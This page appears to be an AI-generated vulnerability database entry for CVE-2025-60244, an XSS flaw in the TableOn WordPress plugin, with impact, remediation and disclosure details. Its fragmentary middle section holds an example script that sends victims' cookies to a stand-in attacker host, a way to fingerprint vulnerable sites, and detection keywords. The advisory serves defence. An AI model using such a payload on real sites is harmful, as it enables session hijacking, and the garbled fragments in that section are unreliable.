
Cloud Vulnerability DB
A community-led vulnerabilities database
CVE-2025-60244 is a Content Injection (Basic XSS) vulnerability in the TableOn WordPress plugin (slug: posts-table-filterable) developed by RealMag777/PluginUs.Net. It allows unauthenticated remote attackers to inject arbitrary script-related HTML tags into web pages, classified under CWE-80 (Improper Neutralization of Script-Related HTML Tags in a Web Page). All versions up to and including 1.0.5.1 are affected; version 1.0.6 contains the fix. The vulnerability was reported on April 22, 2025, and published by Patchstack on May 22, 2025. It carries a CVSS v3.1 base score of 7.1 (High) (Patchstack VDP).
The root cause is improper neutralization of script-related HTML tags in web page output (CWE-80), which enables a reflected or stored cross-site scripting (XSS) / content injection attack. An unauthenticated attacker can craft a malicious payload that, when rendered by a victim's browser, injects arbitrary HTML or script content into the affected page. Exploitation requires user interaction — a privileged user must perform an action such as clicking a malicious link or visiting a crafted page — but no authentication is required on the attacker's side. The vulnerability is mapped to CAPEC patterns including XSS Targeting Non-Script Elements (CAPEC-18), XSS Through HTTP Query Strings (CAPEC-32), and XSS Through HTTP Headers (CAPEC-86) (Patchstack VDP).
Successful exploitation allows an attacker to inject malicious content — including phishing pages or script-based payloads — into posts and pages of the affected WordPress site, impacting confidentiality, integrity, and availability (all rated Low in scope-changed context). Because the scope is changed (S:C), injected content can affect users' browsers beyond the vulnerable application itself, enabling session hijacking, credential phishing, or malware distribution targeting site visitors. The vulnerability is considered suitable for mass-exploit campaigns targeting thousands of WordPress sites regardless of their traffic or popularity (Patchstack VDP).
No public proof-of-concept exploit code or active in-the-wild exploitation has been confirmed at this time. The EPSS score is approximately 0.038%, indicating a low but non-negligible probability of exploitation in the near term. The vulnerability is not currently listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Patchstack notes that vulnerabilities of this class are commonly used in mass-exploit campaigns against WordPress sites and has issued a virtual patch (mitigation rule) for its users (Patchstack VDP).
posts-table-filterable) at version ≤ 1.0.5.1 using tools like WPScan, Shodan, or by checking plugin metadata at /wp-content/plugins/posts-table-filterable/readme.txt.<script>document.location='https://attacker.com/steal?c='+document.cookie</script> or a phishing content block) targeting the vulnerable input field or parameter handled by the plugin.<script>, %3Cscript%3E, onerror=, onload=) in query parameters or POST bodies.<script> tags or iframe elements if the vulnerability is exploited for persistent injection.The primary remediation is to update the TableOn plugin to version 1.0.6 or later, which contains the fix for this vulnerability. Site administrators unable to update immediately should contact their hosting provider or web developer for assistance. Patchstack users benefit from an automatically deployed virtual patch (WAF mitigation rule) that blocks exploitation attempts until the plugin is updated. Additionally, enabling auto-updates for vulnerable plugins via Patchstack or WordPress admin settings is recommended as a general best practice (Patchstack VDP).
The vulnerability was discovered and responsibly disclosed by security researcher ch4r0n through Patchstack's Active VDP (Vulnerability Disclosure Program) on April 22, 2025, and published on May 22, 2025. Patchstack classified it as medium priority and noted its potential for use in mass-exploit campaigns targeting WordPress sites. No significant broader media coverage or notable social media discussion has been identified beyond standard vulnerability database listings (Patchstack VDP).
Source: This report was generated using AI
Free Vulnerability Assessment
Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.
Get a personalized demo
"Best User Experience I have ever seen, provides full visibility to cloud workloads."
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
"We know that if Wiz identifies something as critical, it actually is."